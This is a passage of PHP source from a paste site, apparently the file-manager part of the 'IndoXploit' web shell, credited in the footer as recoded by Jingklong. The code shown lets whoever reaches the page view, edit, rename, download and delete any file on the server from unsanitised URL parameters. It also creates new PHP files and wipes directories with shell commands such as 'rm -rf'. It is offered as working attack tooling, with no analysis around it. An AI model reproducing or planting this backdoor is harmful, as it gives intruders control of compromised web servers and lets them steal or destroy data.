  823. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  824. <input type='submit' name='new_save_file' value='Submit'>
  825. </form>";
  826. } elseif($_GET['act'] == 'newfolder') {
  827. if($_POST['new_save_folder']) {
  828. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  829. if(!mkdir($new_folder)) {
  830. $act = "<font color=red>permission denied</font>";
  831. } else {
  832. $act = "<script>window.location='?dir=".$dir."';</script>";
  833. }
  834. }
  835. echo $act;
  836. echo "<form method='post'>
  837. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  838. <input type='submit' name='new_save_folder' value='Submit'>
  839. </form>";
  840. } elseif($_GET['act'] == 'rename_dir') {
  841. if($_POST['dir_rename']) {
  842. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  843. if($dir_rename) {
  844. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  845. } else {
  846. $act = "<font color=red>permission denied</font>";
  847. }
  848. echo "".$act."<br>";
  849. }
  850. echo "<form method='post'>
  851. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  852. <input type='submit' name='dir_rename' value='rename'>
  853. </form>";
  854. } elseif($_GET['act'] == 'delete_dir') {
  855. if(is_dir($dir)) {
  856. if(is_writable($dir)) {
  857. @rmdir($dir);
  858. @exe("rm -rf $dir");
  859. @exe("rmdir /s /q $dir");
  860. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  861. } else {
  862. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  863. }
  864. }
  865. echo $act;
  866. } elseif($_GET['act'] == 'view') {
  867. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  868. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  869. } elseif($_GET['act'] == 'edit') {
  870. if($_POST['save']) {
  871. $save = file_put_contents($_GET['file'], $_POST['src']);
  872. if($save) {
  873. $act = "<font color=lime>Saved!</font>";
  874. } else {
  875. $act = "<font color=red>permission denied</font>";
  876. }
  877. echo "".$act."<br>";
  878. }
  879. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  880. echo "<form method='post'>
  881. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  882. <input type='submit' value='Save' name='save' style='width: 500px;'>
  883. </form>";
  884. } elseif($_GET['act'] == 'rename') {
  885. if($_POST['do_rename']) {
  886. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  887. if($rename) {
  888. $act = "<script>window.location='?dir=".$dir."';</script>";
  889. } else {
  890. $act = "<font color=red>permission denied</font>";
  891. }
  892. echo "".$act."<br>";
  893. }
  894. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  895. echo "<form method='post'>
  896. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  897. <input type='submit' name='do_rename' value='rename'>
  898. </form>";
  899. } elseif($_GET['act'] == 'delete') {
  900. $delete = unlink($_GET['file']);
  901. if($delete) {
  902. $act = "<script>window.location='?dir=".$dir."';</script>";
  903. } else {
  904. $act = "<font color=red>permission denied</font>";
  905. }
  906. echo $act;
  907. } else {
  908. if(is_dir($dir) === true) {
  909. if(!is_readable($dir)) {
  910. echo "<font color=red>can't open directory. ( not readable )</font>";
  911. } else {
  912. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  913. <tr>
  914. <th class="th_home"><center>Name</center></th>
  915. <th class="th_home"><center>Type</center></th>
  916. <th class="th_home"><center>Size</center></th>
  917. <th class="th_home"><center>Last Modified</center></th>
  918. <th class="th_home"><center>Owner/Group</center></th>
  919. <th class="th_home"><center>Permission</center></th>
  920. <th class="th_home"><center>Action</center></th>
  921. </tr>';
  922. $scandir = scandir($dir);
  923. foreach($scandir as $dirx) {
  924. $dtype = filetype("$dir/$dirx");
  925. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  926. if(function_exists('posix_getpwuid')) {
  927. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  928. $downer = $downer['name'];
  929. } else {
  930. //$downer = $uid;
  931. $downer = fileowner("$dir/$dirx");
  932. }
  933. if(function_exists('posix_getgrgid')) {
  934. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  935. $dgrp = $dgrp['name'];
  936. } else {
  937. $dgrp = filegroup("$dir/$dirx");
  938. }
  939. if(!is_dir("$dir/$dirx")) continue;
  940. if($dirx === '..') {
  941. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  942. } elseif($dirx === '.') {
  943. $href = "<a href='?dir=$dir'>$dirx</a>";
  944. } else {
  945. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  946. }
  947. if($dirx === '.' || $dirx === '..') {
  948. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  949. } else {
  950. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  951. }
  952. echo "<tr>";
  953. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  954. echo "<td class='td_home'><center>$dtype</center></td>";
  955. echo "<td class='td_home'><center>-</center></th></td>";
  956. echo "<td class='td_home'><center>$dtime</center></td>";
  957. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  958. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  959. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  960. echo "</tr>";
  961. }
  962. }
  963. } else {
  964. echo "<font color=red>can't open directory.</font>";
  965. }
  966. foreach($scandir as $file) {
  967. $ftype = filetype("$dir/$file");
  968. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  969. $size = filesize("$dir/$file")/1024;
  970. $size = round($size,3);
  971. if(function_exists('posix_getpwuid')) {
  972. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  973. $fowner = $fowner['name'];
  974. } else {
  975. //$downer = $uid;
  976. $fowner = fileowner("$dir/$file");
  977. }
  978. if(function_exists('posix_getgrgid')) {
  979. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  980. $fgrp = $fgrp['name'];
  981. } else {
  982. $fgrp = filegroup("$dir/$file");
  983. }
  984. if($size > 1024) {
  985. $size = round($size/1024,2). 'MB';
  986. } else {
  987. $size = $size. 'KB';
  988. }
  989. if(!is_file("$dir/$file")) continue;
  990. echo "<tr>";
  991. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  992. echo "<td class='td_home'><center>$ftype</center></td>";
  993. echo "<td class='td_home'><center>$size</center></td>";
  994. echo "<td class='td_home'><center>$ftime</center></td>";
  995. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  996. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  997. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  998. echo "</tr>";
  999. }
  1000. echo "</table>";
  1001. if(!is_readable($dir)) {
  1002. //
  1003. } else {
  1004. echo "<hr>";
  1005. }
  1006. echo "<center>Copyright &copy; ".date("Y")." - <font color=lime>IndoXploit - Recoded By Jingklong</font></center>";
  1007. }
  1008. ?>
  1009. </html>
Add Comment
Please, Sign In to add comment